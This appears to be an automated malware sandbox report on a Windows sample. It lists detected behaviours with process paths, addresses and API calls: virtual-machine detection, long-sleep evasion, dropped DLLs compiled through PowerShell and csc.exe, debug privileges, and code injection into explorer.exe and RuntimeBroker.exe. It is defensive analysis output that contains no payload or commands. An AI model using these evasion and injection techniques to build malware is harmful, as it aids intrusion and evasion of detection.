Registry key monitored for changes: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines

Source: C:\Windows\System32\control.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3698			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1665			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.dll			Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\loaddll32.exe TID: 1928	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5900	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6292	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6280	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02828A61 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	0_2_02828A61
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02826E86 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	0_2_02826E86
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02813DEE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	0_2_02813DEE
Source: C:\Windows\explorer.exe	Code function: 29_2_03B791A0 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,	29_2_03B791A0
Source: C:\Windows\explorer.exe	Code function: 29_2_03B537B8 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,	29_2_03B537B8

Source: C:\Windows\System32\loaddll32.exe

0_2_02831C05

Source: explorer.exe, 0000001D.00000000.389327777.0000000008C64000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWta@
Source: explorer.exe, 0000001D.00000002.510389270.0000000003710000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001D.00000000.387740964.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: RuntimeBroker.exe, 00000022.00000000.381725023.00000209AA054000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Ro
Source: RuntimeBroker.exe, 0000001E.00000002.502607877.000002413A440000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001D.00000000.392680390.000000000DC40000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000001D.00000000.364327459.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 0000001D.00000000.388411193.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 0000001D.00000002.518168118.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 0000001D.00000000.387740964.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000001D.00000000.387740964.0000000008270000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000001D.00000000.388411193.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: explorer.exe, 0000001D.00000000.387740964.0000000008270000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\System32\loaddll32.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_0281DB26 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,

0_2_0281DB26

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_0282DA66 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

0_2_0282DA66

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Source: C:\Windows\System32\loaddll32.exe	Memory allocated: C:\Windows\System32\control.exe base: 290000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\explorer.exe base: 3090000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2413CAD0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1E766730000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 209AB9B0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 165793D0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1EEFEFF0000 protect: page execute and read and write

Changes memory attributes in foreign processes to executable or writable

Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write

Compiles code for process injection (via .Net compiler)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.0.cs

Jump to dropped file

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 9B851580	Jump to behavior
Source: C:\Windows\System32\control.exe	Thread created: C:\Windows\explorer.exe EIP: 9B851580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9B851580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9B851580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9B851580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9B851580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9B851580

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3472 base: E9E000 value: 00	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3472 base: 7FFA9B851580 value: EB	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3472 base: 2AB0000 value: 80	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3472 base: 7FFA9B851580 value: 40	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: PID: 3472 base: E9C000 value: 00
Source: C:\Windows\System32\control.exe	Memory written: PID: 3472 base: 7FFA9B851580 value: EB
Source: C:\Windows\System32\control.exe	Memory written: PID: 3472 base: 3090000 value: 80
Source: C:\Windows\System32\control.exe	Memory written: PID: 3472 base: 7FFA9B851580 value: 40

Maps a DLL or memory area into another process

Source: C:\Windows\System32\loaddll32.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\loaddll32.exe	Thread register set: target process: 6996	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3472	Jump to behavior
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3472
Source: C:\Windows\System32\control.exe	Thread register set: target process: 5244
Source: C:\Windows\explorer.exe	Thread register set: target process: 4016
Source: C:\Windows\explorer.exe	Thread register set: target process: 4288
Source: C:\Windows\explorer.exe	Thread register set: target process: 4448
Source: C:\Windows\explorer.exe	Thread register set: target process: 5436
Source: C:\Windows\explorer.exe	Thread register set: target process: 984

Writes to foreign memory regions

Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF7BEF712E0	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 290000	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF7BEF712E0	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: E9E000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFA9B851580	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 2AB0000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFA9B851580	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: E9C000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 3090000
